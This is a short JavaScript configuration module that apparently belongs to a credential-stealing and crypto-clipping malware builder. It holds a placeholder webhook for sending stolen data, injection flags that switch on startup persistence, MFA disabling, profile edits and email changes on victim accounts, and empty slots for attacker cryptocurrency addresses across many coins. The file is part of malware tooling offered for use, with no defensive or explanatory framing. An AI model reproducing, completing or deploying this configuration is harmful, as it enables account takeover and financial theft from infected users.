module.exports = {
    'webhook': '%WEBHOOK%',
    'inject': {
        'API':                    'null',
        'auto_user_profile_edit': 'true',
        'auto_persist_startup':   'true',
        'auto_mfa_disabler':      'true',
        'auto_email_update':      'true',
    },
    'cryptos': {
        'BTC': '',
        'BCH': '',
        'ETH': '',
        'XMR': '',
        'LTC': '',
        'XCH': '',
        'XLM': '',
        'TRX': '',
        'ADA': '',
        'XRP': '',
        'NEO': '',
        'DASH': '',
        'DOGE': '',
    },
};